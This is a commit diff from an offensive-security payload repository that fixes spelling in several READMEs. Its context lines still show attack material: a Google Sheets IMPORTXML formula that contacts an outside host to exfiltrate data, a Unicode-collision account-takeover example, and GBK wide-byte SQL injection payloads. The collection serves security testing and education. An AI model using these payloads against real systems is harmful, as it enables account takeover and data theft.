Skip to content

Commit 1789498

Browse files
authored
Merge pull request swisskyrepo#787 from clemensGooooo/master
Fixed several typos
2 parents ed28a07 + 01a6299 commit 1789498

File tree

4 files changed

+8
-8
lines changed

4 files changed

+8
-8
lines changed

Account Takeover/README.md

Lines changed: 3 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -13,7 +13,7 @@
1313
* [Leaking Password Reset Token](#leaking-password-reset-token)
1414
* [Password Reset via Username Collision](#password-reset-via-username-collision)
1515
* [Account Takeover Due To Unicode Normalization Issue](#account-takeover-due-to-unicode-normalization-issue)
16-
* [Account Takeover via Web Vulneralities](#account-takeover-via-web-vulneralities)
16+
* [Account Takeover via Web Vulnerabilities](#account-takeover-via-web-vulnerabilities)
1717
* [Account Takeover via Cross Site Scripting](#account-takeover-via-cross-site-scripting)
1818
* [Account Takeover via HTTP Request Smuggling](#account-takeover-via-http-request-smuggling)
1919
* [Account Takeover via CSRF](#account-takeover-via-csrf)
@@ -110,7 +110,7 @@ See: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
110110
111111
### Account Takeover Due To Unicode Normalization Issue
112112
113-
When processing user input involving unicode for case mapping or normalisation, unexcepted behavior can occur.
113+
When processing user input involving unicode for case mapping or normalisation, unexpected behavior can occur.
114114
115115
* Victim account: `demo@gmail.com`
116116
* Attacker account: `demⓞ@gmail.com`
@@ -119,7 +119,7 @@ When processing user input involving unicode for case mapping or normalisation,
119119
120120
[Unicode pentester cheatsheet](https://gosecure.github.io/unicode-pentester-cheatsheet/) can be used to find list of suitable unicode characters based on platform.
121121
122-
## Account Takeover via Web Vulneralities
122+
## Account Takeover via Web Vulnerabilities
123123
124124
### Account Takeover via Cross Site Scripting
125125

CSV Injection/README.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -65,7 +65,7 @@ Technical details of the above payloads:
6565
6666
### Google Sheets
6767
68-
Google Sheets allows some additionnal formulas that are able to fetch remote URLs:
68+
Google Sheets allows some additional formulas that are able to fetch remote URLs:
6969
7070
* [IMPORTXML](https://support.google.com/docs/answer/3093342?hl=en)(url, xpath_query, locale)
7171
* [IMPORTRANGE](https://support.google.com/docs/answer/3093340)(spreadsheet_url, range_string)
@@ -79,7 +79,7 @@ So one can test blind formula injection or a potential for data exfiltration wit
7979
=IMPORTXML("http://burp.collaborator.net/csv", "//a/@href")
8080
```
8181

82-
Note: an alert will warn the user a formula is trying to contact an external ressource and ask for authorization.
82+
Note: an alert will warn the user a formula is trying to contact an external resource and ask for authorization.
8383

8484
## References
8585

Insecure Randomness/README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -188,7 +188,7 @@ Creating your own randomness algorithm is generally not recommended. Below are s
188188

189189
### Tools
190190

191-
Generic identification and sandwitch attack:
191+
Generic identification and sandwich attack:
192192

193193
* [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources
194194

SQL Injection/MySQL Injection.md

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -718,7 +718,7 @@ Wide byte injection is a specific type of SQL injection attack that targets appl
718718

719719
The `SET NAMES gbk` query can be exploited in a charset-based SQL injection attack. When the character set is set to GBK, certain multibyte characters can be used to bypass the escaping mechanism and inject malicious SQL code.
720720

721-
Several characters can be used to triger the injection.
721+
Several characters can be used to trigger the injection.
722722

723723
* `%bf%27`: This is a URL-encoded representation of the byte sequence `0xbf27`. In the GBK character set, `0xbf27` decodes to a valid multibyte character followed by a single quote ('). When MySQL encounters this sequence, it interprets it as a single valid GBK character followed by a single quote, effectively ending the string.
724724
* `%bf%5c`: Represents the byte sequence `0xbf5c`. In GBK, this decodes to a valid multi-byte character followed by a backslash (`\`). This can be used to escape the next character in the sequence.
@@ -756,7 +756,7 @@ For instance, if the input is `?id=1'`, PHP will add a backslash, resulting in t
756756
757757
However, when the sequence `%df` is introduced before the single quote, as in `?id=1%df'`, PHP still adds the backslash. This results in the SQL query: `SELECT * FROM users WHERE id='1%df\'' LIMIT 0,1`.
758758
759-
In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape charactr, allowing for SQL injection.
759+
In the GBK character set, the sequence `%df%5c` translates to the character `連`. So, the SQL query becomes: `SELECT * FROM users WHERE id='1連'' LIMIT 0,1`. Here, the wide byte character `連` effectively "eating" the added escape character, allowing for SQL injection.
760760
761761
Therefore, by using the payload `?id=1%df' and 1=1 --+`, after PHP adds the backslash, the SQL query transforms into: `SELECT * FROM users WHERE id='1連' and 1=1 --+' LIMIT 0,1`. This altered query can be successfully injected, bypassing the intended SQL logic.
762762

0 commit comments

Comments
 (0)